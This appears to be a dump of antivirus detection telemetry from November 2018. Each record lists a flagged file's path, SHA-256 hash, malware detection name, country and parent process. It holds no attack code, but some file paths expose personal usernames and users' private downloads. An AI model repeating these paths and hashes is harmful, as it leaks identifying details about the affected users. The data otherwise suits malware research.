  Row(detection=Row(filename='image4789.jpg', filepath='C:\\Users\\X\\Pictures\\image4789.JPG', filesize=2560000, name='DR/FakePic.Gen.#M1.#R1'), hash='f85ff1cbeba3b7e7aa0b01655aff27dafe3a39989416cc13c27729a907f78d6b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe24_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe24 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T18:22:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='fd403b269eda2a10340dc2153718da08c300dbdf95e067d7f5501e55213531ed', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T19:14:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090711-0beb4597', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db8dd2eb\\AVSCAN-20181104-090024-C0286FC2\\AVSCAN-20181104-090711-0BEB4597', filesize=1536000, name='TR/CoinMiner.CZ.#M1.#R1'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:07:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-211850-9c8cd400', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9eb27ea7\\AVSCAN-20181101-203610-81F5CAA1\\AVSCAN-20181101-211850-9C8CD400', filesize=24000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='fba35f6a347619c4d35e777e22339b45de5ef1d5ed93232ff4ad4b98d1154d3a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:18:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kies.exe', filepath='C:\\Users\\X\\Downloads\\Samsung Kies\\Kies.exe', filesize=39360000, name='HEUR/AGEN.1007165.#M1.#R1'), hash='f57e448afcf57d849aab38b10e44ae5feaeac073fb51829bd5445f8644a96d5e', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T15:11:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fec23600f2134bb055ea9ce0e50a33d2b6557e968854c782bb94177db4f4abb7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\FEC23600F2134BB055EA9CE0E50A33D2B6557E968854C782BB94177DB4F4ABB7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fec23600f2134bb055ea9ce0e50a33d2b6557e968854c782bb94177db4f4abb7', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:38Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.vir', filepath='\\\\?\\C:\\ProgramData\\vshub.VIR', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='DO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074623-3774ba97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e54744e\\AVSCAN-20181102-074523-2F1ADDDC\\AVSCAN-20181102-074623-3774BA97', filesize=4992000, name='DR/Delphi.Gen.#M1.#R1'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:46:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160118-f5b81a93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160118-F5B81A93', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194608-34fed16c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-193336-AEBBE253\\AVSCAN-20181102-194608-34FED16C', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:46:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:06:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155831-e3a54eb4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155831-E3A54EB4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mstjy.exe', filepath='C:\\ProgramData\\mstjy.exe', filesize=70112000, name='WORM/Lodbak.Gen.#M2.#R7829'), hash='5c54ab809c85d95bace97bc56b16f59c2e0aa0b14db212e7a264d6299aeb0149', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:46:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192054-470f11ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54bc9577\\AVSCAN-20181102-191914-3B86E593\\AVSCAN-20181102-192054-470F11AE', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:20:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='editor.exe', filepath='C:\\Users\\X\\Desktop\\C_8_To-Disk-2\\CEHv8 Module 06 Trojans and Backdoors\\Notification Trojans\\S.A.R.S Notifier\\Editor.exe', filesize=448000, name='TR/Delf.C.2.#M1.#R1'), hash='52c43e0f2dd5e961d897f6053de480a6521bf26b8daa2b1efaa63a7cf32e63c0', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\EC-Council Certified Ethical Hacker CEH v8 (Tools)\\\\\\\\EC-Council.Certified.Ethical.Hacker.CEH.v8.Tools.DVD2\\\\\\\\C_8_To-Disk-2.iso\\\\\\"', country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-02T13:52:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T21:44:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:mupygh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:mupygh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T15:00:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-00-43-38.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T22:43:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='level11.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\LEVEL11.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='12c1bba7f31ae2dfcf1472f71fb009ed64afcf02a7695f6e24e2a72ab1263410', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203305-5601ba97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a62e3ab\\AVSCAN-20181102-203204-4A0BCAC6\\AVSCAN-20181102-203305-5601BA97', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07ce1b330d4bed7852d312012938b6d89dc2082e2b203fd32f2962aa37d68f1e.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\15.06.2018-121.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\07ce1b330d4bed7852d312012938b6d89dc2082e2b203fd32f2962aa37d68f1e.MRG', filesize=704000, name='HEUR/AGEN.1032585.#M1.#R1'), hash='07ce1b330d4bed7852d312012938b6d89dc2082e2b203fd32f2962aa37d68f1e', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\18.03.2018-140.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T14:45:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meatholes.com_12.06.10.kelly.xxx.imageset-yapg.rar', filepath='G:\\MeatHoles.com_12.06.10.Kelly.XXX.iMAGESET-YAPG-6\\.tmp\\MeatHoles.com_12.06.10.Kelly.XXX.iMAGESET-YAPG.rar', filesize=4992000, name='TR/Injector.alv.#M1.#R1'), hash='54534d1ecc82ca702ce22010abc0e6629f8d45d91ca0ee601d0aa21ce18ee9ce', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T00:03:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-220406-9ce4c14f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-220406-9CE4C14F', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='supra fast and furious.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\supra_fast_and_furious\\SUPRA FAST AND FURIOUS\\SUPRA FAST AND FURIOUS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='15eb3c37d6bda8e312878d03029d29c179720763c0370ba35b782a29961cab24', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134243-87d7197b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134243-87D7197B', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3e3315421731c5549874b9fca28e65ca66b309974bd50796ee9da6a19af20b4d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3E3315421731C5549874B9FCA28E65CA66B309974BD50796EE9DA6A19AF20B4D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3e3315421731c5549874b9fca28e65ca66b309974bd50796ee9da6a19af20b4d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:39:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mediaespresso.exe', filepath='C:\\Program Files (x86)\\CyberLink\\PowerDVD15\\MediaEspresso\\MediaEspresso.exe', filesize=360000, name='W32/Sality.AT.#M1.#R1'), hash='14b11b2c26bc0106392ad0794283fce71961a7cad7868e3d383406c7151191e9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bJ7x0A2aSEilmu92.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:21:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='content x6.exe', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Content X6.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084317-70fbd4f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-084259-6DA60A05\\AVSCAN-20181102-084317-70FBD4F6', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:43:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='palettes.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Trunks\\palettes\\palettes.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='40907cdd3aefe9e46592ac5e0c1308c4aa37a4d92a274b566f820b6085cc953e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='svchost.exe', filepath='C:\\Documents and Settings\\X\\Dane aplikacji\\29899417\\svchost.exe', filesize=320000, name='HEUR/AGEN.1004092.#M1.#R1'), hash='1e2ac26940534dcd587aef71a1b70ff53cfc8714cd59431ee5687493869d916d', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:54:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aefuwin32.exe', filepath='C:\\Program Files (x86)\\MSI\\Live Update\\FlashUty\\AMI\\EFIWIN\\AEFUWIN32.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='15b9925ac1a18c98f6cac85ac30679bfe0434216e30fcbdc652f230a0118a19a', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:23:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:06Z'), dt=datetime.date(2018, 11, 2)),
